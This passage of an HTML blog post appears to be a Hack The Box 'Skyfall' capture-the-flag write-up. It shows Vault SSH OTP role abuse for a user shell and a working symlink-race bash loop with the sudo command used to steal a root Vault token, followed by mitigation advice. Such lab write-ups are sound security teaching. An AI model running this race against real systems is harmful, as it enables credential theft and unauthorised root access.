class="p">)</span> <span class="ow">and</span> <span class="n">certificate</span> <span class="n">authority</span><span class="p">.</span> <span class="n">The</span> <span class="n">desired</span> <span class="n">behavior</span> </span></span><span class="line"><span class="cl"><span class="n">is</span> <span class="n">role</span><span class="o">-</span><span class="n">specific</span> <span class="ow">and</span> <span class="n">chosen</span> <span class="n">at</span> <span class="n">role</span> <span class="n">creation</span> <span class="n">time</span> <span class="n">with</span> <span class="n">the</span> <span class="s1">&#39;key_type&#39;</span> </span></span><span class="line"><span class="cl"><span class="n">parameter</span><span class="p">.</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">##</span> <span class="n">PATHS</span> </span></span><span class="line"><span class="cl"> <span class="o">^</span><span class="n">roles</span><span class="o">/</span><span class="p">(</span><span class="err">?</span><span class="n">P</span><span class="o">&lt;</span><span class="n">role</span><span class="o">&gt;</span><span class="err">\</span><span class="n">w</span><span class="p">(([</span><span class="err">\</span><span class="n">w</span><span class="o">-</span><span class="p">.</span><span class="err">@</span><span class="p">]</span><span class="o">+</span><span class="p">)</span><span class="err">?\</span><span class="n">w</span><span class="p">)</span><span class="err">?</span><span class="p">)</span><span class="err">$</span> </span></span><span class="line"><span class="cl"> <span class="n">Manage</span> <span class="n">the</span> <span class="s1">&#39;roles&#39;</span> <span class="n">that</span> <span class="n">can</span> <span class="n">be</span> <span class="n">created</span> <span class="n">with</span> <span class="n">this</span> <span class="n">backend</span><span class="p">.</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="o">^</span><span class="n">roles</span><span class="o">/</span><span class="err">?$</span> </span></span><span class="line"><span class="cl"> <span class="n">Manage</span> <span class="n">the</span> <span class="s1">&#39;roles&#39;</span> <span class="n">that</span> <span class="n">can</span> <span class="n">be</span> <span class="n">created</span> <span class="n">with</span> <span class="n">this</span> <span class="n">backend</span><span class="p">.</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="err">❯</span> <span class="n">vault</span> <span class="n">token</span> <span class="n">capabilities</span> <span class="n">ssh</span><span class="o">/</span> </span></span><span class="line"><span class="cl"><span class="n">list</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="err">❯</span> <span class="n">vault</span> <span class="n">kv</span> <span class="n">list</span> <span class="n">ssh</span><span class="o">/</span><span class="n">roles</span> </span></span><span class="line"><span class="cl"><span class="n">Keys</span> </span></span><span class="line"><span class="cl"><span class="c1">----</span> </span></span><span class="line"><span class="cl"><span class="n">admin_otp_key_role</span> </span></span><span class="line"><span class="cl"><span class="n">dev_otp_key_role</span> </span></span></code></pre></div><p>Now looking at the output, I can see that out of the two ways of ssh, it uses the <code>OTP</code> method. The <a class="link" href="https://developer.hashicorp.com/vault/docs/secrets/ssh/one-time-ssh-passwords" target="_blank" rel="noopener" >help-two</a> shows two flags to be passed, <code>-role</code> and <code>-mode</code>. I have values for both. The <code>-mode</code> is <code>otp</code>, now out of the two values I have of <code>-role</code>, only the <code>dev_otp_key_role</code> worked and got the user <code>askyy</code> shell. 😁😁 <img src="https://crippledmind-infosec-journal.netlify.app/posts/writeups/htb/skyfall/sshaskyy.png" width="2034" height="814" srcset="https://crippledmind-infosec-journal.netlify.app/posts/writeups/htb/skyfall/sshaskyy_hue5d7c2230e26c484f4cb61e69795b0a3_182520_480x0_resize_box_3.png 480w, https://crippledmind-infosec-journal.netlify.app/posts/writeups/htb/skyfall/sshaskyy_hue5d7c2230e26c484f4cb61e69795b0a3_182520_1024x0_resize_box_3.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="249" data-flex-basis="599px" ></p> <h2 id="privilege-escalation">Privilege Escalation </h2><p>I looked now ways to privesc. Running <code>sudo -l</code> gave me that. <img src="https://crippledmind-infosec-journal.netlify.app/posts/writeups/htb/skyfall/sudol.png" width="2624" height="310" srcset="https://crippledmind-infosec-journal.netlify.app/posts/writeups/htb/skyfall/sudol_hu3807f68e704893f6977b619637333150_95465_480x0_resize_box_3.png 480w, https://crippledmind-infosec-journal.netlify.app/posts/writeups/htb/skyfall/sudol_hu3807f68e704893f6977b619637333150_95465_1024x0_resize_box_3.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="846" data-flex-basis="2031px" > Now there was no read/write access to the concerned files.</p> <ul> <li>I tried <span style="color: #d461e8">command injection</span>, but since a regex is being used, I was not able to bypass it.</li> <li>While running with <code>-v</code> option, I noticed some high privileged token printed as ******,</li> </ul> <p><img src="https://crippledmind-infosec-journal.netlify.app/posts/writeups/htb/skyfall/sudov.png" width="1622" height="684" srcset="https://crippledmind-infosec-journal.netlify.app/posts/writeups/htb/skyfall/sudov_huf0695ccf5649134b8b240cbe2a66b77a_162645_480x0_resize_box_3.png 480w, https://crippledmind-infosec-journal.netlify.app/posts/writeups/htb/skyfall/sudov_huf0695ccf5649134b8b240cbe2a66b77a_162645_1024x0_resize_box_3.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="237" data-flex-basis="569px" > Now adding the <code>-d</code> flag, the token is stored in a <code>debug.log</code> file in the same directory from where the script was run. But it was created with only access to <code>root</code> user. I tried <span style="color: #d461e8">creating the file beforehand</span>, making it world-readable/writable, but no whenever I run the script, it removes the file if exists, then creates a new file with only <code>root</code> readable, then writes to it.</p> <ul> <li>Next I tried by creating a <span style="color: #d461e8">symlink</span> to another file hoping that the linked file will be written which I control then I can read it. But that linked file only got changed🫠🫠</li> </ul> <p>I tried many different methods from here on. Tried different variations of the <code>symlink</code> method. I looked for <code>sudo</code> exploits. Tried making the script write to <code>/dev/tcp</code>, <code>/dev/shm</code>, <code>/tmp</code>, in every case either the file was not created or not readable. Even <code>linpeas.sh</code> did not gave me anything userful.</p> <p>Now I got fed up and stopped this shit. 🙃🙃🙃</p> <h3 id="after-9-days-">After 9 days 🥸🥸🥸 </h3><p>I started searching for various privesc methods online. Nothing interesting. Now I thought why not ask chatgpt(glad I did🫠). It gave me several methods that I had already tried, even the symlink one. After a lot of back and fourth, it was insisting me to try the symlink method. So I searched on google for potential exploits. I got this <a class="link" href="https://int0x33.medium.com/day-50-symbolic-link-attack-overwrite-root-files-with-suid-root-invocation-b9d4d6627233" target="_blank" rel="noopener" >symbolic race attack</a> article, which was the needed path for privesc. <div class="notice notice-info"> <span style="color: #d461e8">Wikipedia</span>: A symlink race is a kind of software security vulnerability that results from a program creating files in an insecure manner.[1] A malicious user can create a symbolic link to a file not otherwise accessible to them. When the privileged program creates a file of the same name as the symbolic link, it actually creates the linked-to file instead, possibly inserting content desired by the malicious user (see example below), or even provided by the malicious user (as input to the program). It is called a "race" because in its typical manifestation, the program checks to see if a file by that name already exists; if it does not exist, the program then creates the file. <span style="color: #d461e8">An attacker must create the link in the interval between the check and when the file is created.</span> </div></p> <p>So in this case, what I have to do is time the symlinking of <code>debug.log</code> file to a file controlled by me, <code>my_log</code> exactly between the script checking the file&rsquo;s presence and creating it. So to do this, I need to</p> <ul> <li>Create a script that will run continuously in a loop to do two things, <ul> <li>remove the debug.log file</li> <li>create a symlink from <code>debug.log</code> file to <code>my_log</code></li> </ul> </li> <li>In another terminal, keep on running the sudo script and checking if the <code>my_log</code> has been written with the contents of <code>debug.log</code>.</li> </ul> <p>I created a <code>toot</code> directory in <code>/home/askyy</code>. I created a <code>my_log</code> file world readable/writable permissions. Then the following script, and executed it.</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"><span class="cp">#!/bin/bash </span></span></span><span class="line"><span class="cl"><span class="cp"></span><span class="k">while</span> true<span class="p">;</span> <span class="k">do</span> </span></span><span class="line"><span class="cl"> rm -f /home/askyy/tmp/debug.log </span></span><span class="line"><span class="cl"> ln -s /home/askyy/tmp/my_log /home/askyy/tmp/debug.log </span></span><span class="line"><span class="cl"><span class="k">done</span> </span></span></code></pre></div><p>I got another ssh session in another terminal. Then kept on executing the following code to check the successful timing of the attack.</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-lua" data-lang="lua"><span class="line"><span class="cl"><span class="n">askyy</span><span class="err">@</span><span class="n">skyfall</span><span class="p">:</span><span class="o">~</span><span class="err">$</span> <span class="n">sudo</span> <span class="o">/</span><span class="n">root</span><span class="o">/</span><span class="n">vault</span><span class="o">/</span><span class="n">vault</span><span class="o">-</span><span class="n">unseal</span> <span class="o">-</span><span class="n">c</span> <span class="o">/</span><span class="n">etc</span><span class="o">/</span><span class="n">vault</span><span class="o">-</span><span class="n">unseal.yaml</span> <span class="o">-</span><span class="n">d</span><span class="p">;</span> <span class="n">ls</span> <span class="o">-</span><span class="n">la</span> </span></span></code></pre></div><p>After some 10-11 tries, I saw the contents had bee written to <code>my_log</code> file. s <img src="https://crippledmind-infosec-journal.netlify.app/posts/writeups/htb/skyfall/yippe.png" width="1968" height="472" srcset="https://crippledmind-infosec-journal.netlify.app/posts/writeups/htb/skyfall/yippe_hu598b25bf2cff1d7f405bf398ebd8b976_145633_480x0_resize_box_3.png 480w, https://crippledmind-infosec-journal.netlify.app/posts/writeups/htb/skyfall/yippe_hu598b25bf2cff1d7f405bf398ebd8b976_145633_1024x0_resize_box_3.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="416" data-flex-basis="1000px" ></p> <p>So it had another <code>vault token</code>, obviously after all this, it should be the root user&rsquo;s token only 🫠🫠🫠 I replaced the earlier token in my <code>.bashrc</code> with this new one. Then using the <code>admin_otp_key_role</code>, was able to login to root user&rsquo;s ssh session. <img src="https://crippledmind-infosec-journal.netlify.app/posts/writeups/htb/skyfall/sshroot.png" width="2478" height="968" srcset="https://crippledmind-infosec-journal.netlify.app/posts/writeups/htb/skyfall/sshroot_hu2dc87a84221ed873bd9b47bc6fe76985_227431_480x0_resize_box_3.png 480w, https://crippledmind-infosec-journal.netlify.app/posts/writeups/htb/skyfall/sshroot_hu2dc87a84221ed873bd9b47bc6fe76985_227431_1024x0_resize_box_3.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="255" data-flex-basis="614px" ></p> <h2 id="mitigation-techniques">Mitigation Techniques </h2><ol> <li> <p><strong>Restrict Access to Sensitive Pages</strong>:</p> <ul> <li>Ensure that access to sensitive pages such as MinIO metrics is properly restricted. Use proper authentication and authorization mechanisms to prevent unauthorized access.</li> <li>Implement IP whitelisting and network segmentation to limit access to administrative interfaces.</li> </ul> </li> <li> <p><strong>Secure Credentials and Sensitive Information</strong>:</p> <ul> <li>Avoid storing sensitive information, such as credentials and tokens, in publicly accessible places or environment variables. Use secrets management solutions like HashiCorp Vault to securely store and access credentials.</li> <li>Regularly audit and rotate credentials to minimize the impact of any potential disclosure.</li> </ul> </li> <li> <p><strong>Proper File Permissions</strong>:</p> <ul> <li>Ensure that sensitive files, such as logs and configuration files, have appropriate permissions set to prevent unauthorized access. Use least privilege principle when setting file permissions.</li> <li>Regularly audit file permissions and access controls to ensure compliance with security policies.</li> </ul> </li> <li> <p><strong>Implement Security Controls for Command Line Tools</strong>:</p> <ul> <li>Restrict the use of command line tools like <code>minio mc</code> and <code>HashiCorp Vault CLI</code> to authorized users only. Ensure that only necessary commands are available to users.</li> <li>Implement logging and monitoring for the use of such tools to detect and respond to any unauthorized or suspicious activity.</li> </ul> </li> <li> <p><strong>Mitigate Symlink Race Vulnerabilities</strong>:</p> <ul> <li>Validate and sanitize all inputs and file paths to prevent symlink attacks. Ensure that temporary files and directories are created in secure locations.</li> <li>Use secure programming practices to avoid race conditions and ensure atomic operations when dealing with file system operations.</li> </ul> </li> <li> <p><strong>Monitor and Respond to Anomalous Activities</strong>:</p> <ul> <li>Implement continuous monitoring and alerting for unusual activities, such as unauthorized access attempts, sensitive file modifications, and unexpected command executions.</li> <li>Have an incident response plan in place to quickly respond to and mitigate any detected security incidents.</li> </ul> </li> </ol> <h2 id="conclusion">Conclusion </h2><p>The Skyfall HTB box showcased several critical vulnerabilities that could lead to a full system compromise. By identifying and exploiting weaknesses in access control, sensitive information disclosure, and file permission configurations, an attacker could escalate their privileges and gain root access. To prevent such security breaches, it is crucial to implement comprehensive security measures, including proper access controls, secure storage and handling of sensitive information, regular auditing of file permissions, and monitoring of system activities.</p> <h2 id="references">References </h2><ul> <li><a class="link" href="https://github.com/RustScan/RustScan" target="_blank" rel="noopener" >https://github.com/RustScan/RustScan</a></li> <li><a class="link" href="https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/403-and-401-bypasses" target="_blank" rel="noopener" >https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/403-and-401-bypasses</a></li> <li><a class="link" href="https://github.com/lobuhi/byp4xx" target="_blank" rel="noopener" >https://github.com/lobuhi/byp4xx</a></li> <li><a class="link" href="https://github.com/devploit/nomore403" target="_blank" rel="noopener" >https://github.com/devploit/nomore403</a></li> <li><a class="link" href="https://vulners.com/nuclei/NUCLEI:CVE-2023-28432" target="_blank" rel="noopener" >https://vulners.com/nuclei/NUCLEI:CVE-2023-28432</a></li> <li><a class="link" href="https://min.io/docs/minio/linux/reference/minio-mc.html" target="_blank" rel="noopener" >https://min.io/docs/minio/linux/reference/minio-mc.html</a></li> <li><a class="link" href="https://min.io/docs/minio/linux/reference/minio-mc.html?ref=docs" target="_blank" rel="noopener" >https://min.io/docs/minio/linux/reference/minio-mc.html?ref=docs</a></li> <li><a class="link" href="https://developer.hashicorp.com/vault" target="_blank" rel="noopener" >https://developer.hashicorp.com/vault</a></li> <li><a class="link" href="https://developer.hashicorp.com/vault/install" target="_blank" rel="noopener" >https://developer.hashicorp.com/vault/install</a></li> <li><a class="link" href="https://irezyigit.medium.com/vault-part9-deeper-look-into-tokens-72da0dceb5ef" target="_blank" rel="noopener" >https://irezyigit.medium.com/vault-part9-deeper-look-into-tokens-72da0dceb5ef</a></li> <li><a class="link" href="https://developer.hashicorp.com/vault/docs/secrets/ssh/one-time-ssh-passwords" target="_blank" rel="noopener" >https://developer.hashicorp.com/vault/docs/secrets/ssh/one-time-ssh-passwords</a></li> <li><a class="link" href="https://github.com/Sn1r/Forbidden-Buster" target="_blank" rel="noopener" >https://github.com/Sn1r/Forbidden-Buster</a></li> </ul>